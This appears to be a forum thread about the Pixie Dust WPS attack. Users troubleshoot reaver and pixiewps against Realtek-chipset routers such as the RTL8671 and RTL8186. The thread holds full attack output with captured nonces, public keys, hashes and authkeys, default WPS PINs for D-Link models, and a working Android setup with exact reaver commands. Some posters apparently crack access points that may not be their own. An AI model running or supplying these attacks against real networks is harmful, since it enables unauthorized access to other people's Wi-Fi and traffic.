I just looked up the RTL8671, it is a CPU chip and not a NIC. Do you know the exact mode number of the AP and can you provide a firmware/open source code for it? Thanks.
Printable View
There is no FCC ID printed on the router. The PIN is also not printed on the router. The exact model of the AP is DIGISOL DG-BG4100NU which uses RTL8186 and not the newer RTL8671. Firmware of the router can be downloaded here https://dl.dropboxusercontent.com/u/..._11OCT2014.zip Firmware of the chipset http://sourceforge.net/projects/rtl8186/
Hi, @DetmL, @soxrok2212,
I ,recently came to know about the vulnerabilities of Realtek and other chipsets and thought to check if my router was vulnerable and ran reaver with pixie dust mode -K 1
where I got to know that the model number EV-2006-07-27 belongs to RTL8671 chipset(D-link router).
However I'm getting that
"WPS pin not found"
The output is given below:
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 7b:37:51:7f:6c:c7:a8:0b:27:e9:a1:f8:5b:88:b5:40
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: c2:ed:e2:d6:80:81:48:fd:7e:13:7b:d2:3e:6c:a0:98
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: ef:eb:93:91:fc:f0:16:3a:3e:b4:fe:dd:8f:b6:a8:fe:a6 :6a:7e:70:55:e5:20:78:c4:3a:c5:55:66:60:be:d0
[+] Sending M2 message
[P] E-Hash1: be:74:91:eb:c3:38:e0:59:7c:e1:de:5c:07:d5:1b:d3:d7 :e6:15:9e:06:09:96:f9:7c:08:4a:84:cc:df:35:0e
[P] E-Hash2: 90:bf:2e:36:f0:65:0e:f6:41:e7:97:f8:71:02:8b:11:92 :c1:89:f1:99:63:2b:fa:01:12:6c:c5:04:b6:ec:cc
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 3 s
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
So I ran pixiewps seperately instead of reaver and it is giving me a strange error :
[!] Bad enrollee public key -- d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:
I don't know what it means.
I hope you'd shed some light on that and help.... :)
First, you can not use -S in your reaver command for Realtek devices. Nobody really knows why but somehow it stops pixiewps from recovering the pin.
Second, the RTL8671 chip is strange. It seems to use a different RNG or something. I know a few people are looking into it though :)
--I've also noticed that your nonce doesn't follow the 00:00:XX:XX:00:00:XX:XX pattern seen in other RTL8671 chips... hmmm. Would you be able to send me a cap containing a few WPS exchanges?
As for the Bad enrollee key, its probably just a space somewhere in your syntax that is screwing it up. Actually I just found it:
Try this instead (you'll probably have to do this for every piece of data)Code:d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63
Welcome to the forums by the way :cool:Code:d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63
Is it A DSL-2730U/DSL-2750U?
Hi DetmL
For the two models you speak about we could gathered generic PIN ( cf WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...)
DSL-2730U > 20172527
DSL-2750U > 21464065
If there is a common PIN we already now that we deal with a "weak" WPS implementation and so there is hope... it could be "pixie dusted" somehow...
If you have one of this models could you please send to soxrok2212 / wiire (or you can send it to me and i wil share with them) a *.cap file with the reaver 1.5.2 stdout?
Maybe if that is not asking too much you can add some screenshot /copy-paste from the administration interface with Wifi-WPS security parameter and information about device ?
Thanks in advance
@soxrok2212
Firstly, I apologize for late reply.I have got exams, last few days have been pretty intense.
1) I tried without --dh-small-keys, but no luck
Still WPS pin not found.
2) I've mailed to your old email-id the reaver outputs.
3) yea and the spaces between enrollee key :|
tried pixiewps with correct syntax but no luck :(
It says AP might be vulnerable try bruteforcing.
Tried with --force couple of times but pin not found their either.
@DetmL
It is D-link DSL-2750U rev U1
Wikidevi link: https://wikidevi.com/wiki/D-Link_DSL-2750U_rev_U1
@Kcdtv
Sorry for the confusion. I don't have either of the device.
I run
sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
Any ideas what is wrong?
I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).
I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .
It is unreliable, but I think injection works:
sudo aireplay-ng -9 mon0
14:00:37 Trying broadcast probe requests...
14:00:37 Injection is working!
.........
14:00:39 Trying directed probe requests...
14:00:39 84:9C:A6:A7:22:22 - channel: 2 - 'o2-WLAN25'
14:00:39 Ping (min/avg/max): 0.978ms/5.656ms/47.815ms Power: -49.97
14:00:39 30/30: 100%
14:00:39 02:23:08:F9:33:11 - channel: 1 - 'EasyBox-C54211'
14:00:40 Ping (min/avg/max): 0.926ms/7.952ms/44.700ms Power: -43.68
14:00:40 28/30: 93%
Sorry i didn't see your message.
For sure; thank you very much! I send you a mp with my mail.
@ bora.
This is not really a "pixie dust issue" if you don't get a M3... It is an issue for the pixie dust attack but the problem is about how the WPS flow is done.
And more information would be needed to be able to guess where the problem can come from.
Don't worry : It is relliable if areplay-ng -9 works; your card can inject.Quote:
It is unreliable, but I think injection works:
It is not that people don't want to help you but your questions are "offtopic."
It could be an issue with reaver, with your card, with your system configuration or with the access point... etc.
But for sure it has nothing to do with pixiewps : pixiewps needs that you collect the needed strings properly or ti cannot make the brute force of the M3.
How to get the M3 to brute force it with it "authkey" is another question, another subject
Cheers
Just a quick update on the state of the 'project'.
I'm really busy at the moment. I'll update/fix pixiewps when I'll be back (2-3 weeks), with (hopefully) some news.
Best of luck!
Looking forward to it.
hi i wanted help reagrding an Dlink DSL 2750u router i was testing with RTL8167 chipset with pixiewps.any updates on the issue?
We are still looking into RTL816x chipset. We have have some information about how the nonce might be 'built'. However it's still not enough to implement a feasible bruteforce.
Nice work indeed,tried this today on DIR-605L and worked like a charm even with bad signals ( AP is too very away), WPS trans failed for a few times and then voila.
PIN was not default and start with 4,normal WPS attack vector would never have found it coz of lockout
I think WPS attack is not possible for NETGEAR? tried with two different AP but no luck.
I got lot of APS if u want me to test something new.
Ported to Android.
https://github.com/aanarchyy/pixiewps-android
Binaries to pixiewps and reaver-t6x.
http://www.mediafire.com/download/bw...android.tar.gz
Nice job aanarchy!
I have confirmed the t6x_reaver port does work, little bit of segault action going on, but it has about a %70 success rate for me, but that may be hardware related... TESTERS APPRECIATED!!!!
I have agreed with the developers to not release an APK.
Prerequisites:
Install both linked binaries(reaver and pixiewps) in the path(eg copy to /system/xbin)
Have a working copy of bcmon on device.
How I got it working:
Enable monitor mode though the bcmon app.
Open shell in a terminal emulator on device.
Obtian root in shell.
Load the bcmon wrapper
Then run reaver as normal...Code:LD_PRELOAD=/data/data/com.bcmon.bcmon/files/libs/libfake_driver.so sh
Code:reaver -i wlan0 -b <target> -K1 -P -vvv
Hello Guys,
I have tried pixiewps 1.1 on Kali 2.0. I have found Pxiewps does not work with Realtek RTL8671 chipset. i have tried with -V 3 -f 4 option but no luck.
Has anyone faced the issue for chipset Realtek RTL8671?
Thanks in advance.
Yes, it is a known problem. RTL8671 is a SoC (System on Chip) and its seems that their number generation is a bit different than their other chips.
Thank you for the information.
Hi soxrok2212 !
Today, i have found the tool created by SlientGhost. https://github.com/SilentGhostX/HT-WPS-Breaker. It does working for RTL8671 with Model number 2010 as per given screen shot in the URL. When i tried with RTL8671 model number 2006. it seems to be not working with model 2006.
I am not getting hash code .......please check my attached picture and please guide me further details ...Attachment 906
I am using HT-WPS Breaker By Silent Ghost X
Chipset : Realtek RTL8671
WPS Manufacturer: Wireless Router
WPSModel Name: RTL8671
WPS Model Number: EV-2006-07-27
Access Point Serial Number: 123456789012347
Needed Information as below:
Trying pin 12345670.
I m waiting for 3 hours and getting Sorry pin not found , good luck next time...
Veterans please guide further guidance...
Thanks in advance
jenisbob
Attachment 921
Attachment 922
Dear soxrok2212 ,
thanks for quick response..
Again i am not getting wps pin on TP-link Router ..please check attached picture.Attachment 931